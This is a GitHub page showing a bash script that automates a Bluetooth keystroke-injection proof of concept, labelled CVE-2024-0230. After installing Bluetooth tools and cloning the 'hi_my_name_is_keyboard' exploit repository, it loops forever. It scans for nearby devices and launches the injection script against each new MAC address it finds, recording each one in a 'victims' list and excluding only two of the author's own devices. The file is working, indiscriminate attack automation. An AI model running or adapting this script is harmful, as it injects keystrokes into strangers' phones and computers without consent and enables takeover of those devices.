-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathpoc.sh
180 lines (178 loc) · 6.71 KB
/
poc.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
#!/bin/bash
clear
#set -x
#------------------------------------------------
# Banner for the 1337'ishness
#------------------------------------------------
cat << "EOF"
HELPER SCRIPT FOR TESTING THE
BLUETOOTH POC CVE-2024-0230
EOF
#------------------------------------------------
# Variables
#------------------------------------------------
RFKILL="/usr/sbin/rfkill"
HCITOOL="/usr/bin/hcitool"
HCICONFIG="/usr/bin/hciconfig"
#------------------------------------------------
# Arrays
#------------------------------------------------
declare -A mac_list # Found MAC addresses and their associated data
declare -A exclude_list # Exclude MAC addresses
declare -A victims_list # List of victims we have attacked
#------------------------------------------------
# Exclude list of MAC's NOT to attack
#------------------------------------------------
exclude_list["58:1C:F8:09:9A:F2"]=1 # Illuminati-PC
exclude_list["78:64:C0:1E:FA:42"]=1 # Illuminati-4G
#------------------------------------------------
# PRE
#------------------------------------------------
# Only run as user root
if [ ${UID} -ne 0 ]; then
printf "\n### ERROR - This script must run as user root (or with sudo)\n\n"
exit 1
fi
# Ensure script is run with a bash version that supports associative arrays
if [[ "${BASH_VERSINFO:-0}" -lt 4 ]]; then
echo "Bash version 4.0 or later is required."
exit 1
fi
# Install needed utils
for PACKET in python3-bluez python3-pydbus rfkill bluez git; do
if [ $(dpkg -l ${PACKET} 2>/dev/null | grep -c "^ii ${PACKET}") -eq 0 ]; then
printf "%-50s" "Installing ${PACKET}"
apt-get update -qq -y > /dev/null 2>&1 & apt-get install -y -qq ${PACKET} > /dev/null 2>&1
if [ $(dpkg -l ${PACKET} 2>/dev/null | grep -c "^ii ${PACKET}") -eq 0 ]; then
echo "[FAILED]"
printf "\nInstallation of ${PACKET} failed!\n\n"
exit 1
else
echo "[OK]"
fi
fi
done
# Check if utilities exist
for UTIL in ${HCITOOL} ${HCICONFIG} ${RFKILL}; do
if [ ! -x ${UTIL} ]; then
printf "\n### ERROR - Could not find ${UTIL}\n\n"
exit 1
fi
done
#------------------------------------------------
# Download POC scripts
#------------------------------------------------
if [ ! -d hi_my_name_is_keyboard ]; then
printf "%-50s" "Git-Cloning /marcnewlin/hi_my_name_is_keyboard"
git clone -q https://github.com/marcnewlin/hi_my_name_is_keyboard
echo "[OK]"
fi
cd hi_my_name_is_keyboard
#------------------------------------------------
# TRAP
#------------------------------------------------
trap '
printf -- "\n--------------------------------------------------------------------------------------\n"
printf "$(date) - Attack stopped\n"
printf -- "--------------------------------------------------------------------------------------\n"
if [ ${STOP_BLUETOOTH:-0} -ne 0 ]; then
systemctl stop bluetooth > /dev/null 2>&1
fi
if [ ${#mac_list[@]} -ne 0 ]; then
printf "\nSummary of Attacked Devices:\n"
printf -- "--------------------------------------------------------------------------------------\n"
for mac in "${!mac_list[@]}"; do
echo "MAC: $mac Data: ${mac_list[$mac]}"
done
printf -- "--------------------------------------------------------------------------------------\n"
fi
' exit
#------------------------------------------------
# MAIN
#------------------------------------------------
# Start bluetooth service
if [ $(systemctl is-active bluetooth|grep -c ^active) -eq 0 ]; then
printf "%-50s" "Startng bluetooth service"
STOP_BLUETOOTH=1
systemctl start bluetooth > /dev/null 2>&1
if [ $(systemctl is-active bluetooth|grep -c ^active) -eq 0 ]; then
echo "[FAILED]"
exit 1
fi
echo "[OK]"
fi
#------------------------------------------------
# Rfkill Unblock bluetoooth
#------------------------------------------------
if [ $(${RFKILL} --noheadings -o SOFT,HARD list bluetooth|tr ' ' '\n'|grep -v ^$|grep -c ^blocked) -ne 0 ]; then
printf "%-50s" "Running \"rfkill unblock bluetooth\""
${RFKILL} unblock bluetooth > /dev/null 2>&1
echo "[OK]"
fi
sleep 1
#------------------------------------------------
# Ensure HCI device is up (on)
#------------------------------------------------
activated=0
for HCI in $(${HCICONFIG}|grep ^hci|cut -d ':' -f1|awk '{print $1}'); do
${HCICONFIG} ${HCI} up > /dev/null 2>&1
((activated++))
done
if [ ${activated:-0} -eq 0 ]; then
printf "### An error occoured - HCI device not responding\n\n"
exit 1
fi
#------------------------------------------------
# FUNCTIONS
#------------------------------------------------
is_this_a_known_mac() { # Function to check if a MAC address is in the array
local mac=$1
[[ -n "${mac_list[$mac]}" ]]
}
#------------------------------------------------
# SCAN AND EXPLOIT
#------------------------------------------------
echo ""
printf -- "--------------------------------------------------------------------------------------\n"
printf "$(date) - Starting attack\n"
printf -- "--------------------------------------------------------------------------------------\n"
attacked=0
printf "%-50s %10s uniq, %s new %s attacked" "$(date) - Device(s) found:" "0" "0" "0"
while true; do
scanning_data=$(${HCITOOL} scan | grep -v ^Scanning) # Perform the scan and filter out the header line
new_macs_found=0
while IFS= read -r line; do # Process each found MAC address and format it
formatted_line=$(echo "$line" | sed -E 's/^[[:space:]]*([0-9A-F:]{17})[[:space:]]*(.*)$/\1,\2/')
mac=$(echo "$formatted_line" | awk -F, '{print $1}')
data=$(echo "$formatted_line" | awk -F, '{print $2}')
if [[ -n "$mac" && -n "$data" ]]; then
if ! is_this_a_known_mac "$mac"; then
mac_list["$mac"]="$data"
((new_macs_found++))
NEW=1
fi
fi
done <<< "$scanning_data"
#------------------------------------------------
if [ ${#mac_list[@]} -ne 0 ] && [ ${NEW:-0} -eq 1 ]; then
if [ ! -n "${exclude_list[$mac]}" ] && [ ! -n "${victims_list[$mac]}" ] ; then
NEW=0
printf "\n%-50s %10s uniq, %s new %s attacked" "$(date) - Device(s) found:" "${#mac_list[@]}" "${new_macs_found}" "${attacked}"
#------------------------------------------------
# Attack
#------------------------------------------------
for HCI in $(${HCICONFIG}|grep ^hci|cut -d ':' -f1|awk '{print $1}'); do
printf "\n\n%-50s\n" "Attacking ${mac} | ${data}"
((attacked++))
printf -- "--------------------------------------------------------------------------------------\n"
timeout 30 ./keystroke-injection-android-linux.py -i ${HCI} -t ${mac}
victims_list["${mac}"]=1 # Add the target to the victims list so we do not attack them more than 1 time.
printf "\n"
printf "%-50s %10s uniq, %s new %s attacked" "$(date) - Device(s) found:" "${#mac_list[@]}" "0" "${attacked}"
done
fi
fi
done
#------------------------------------------------
# END OF SCRIPT
#------------------------------------------------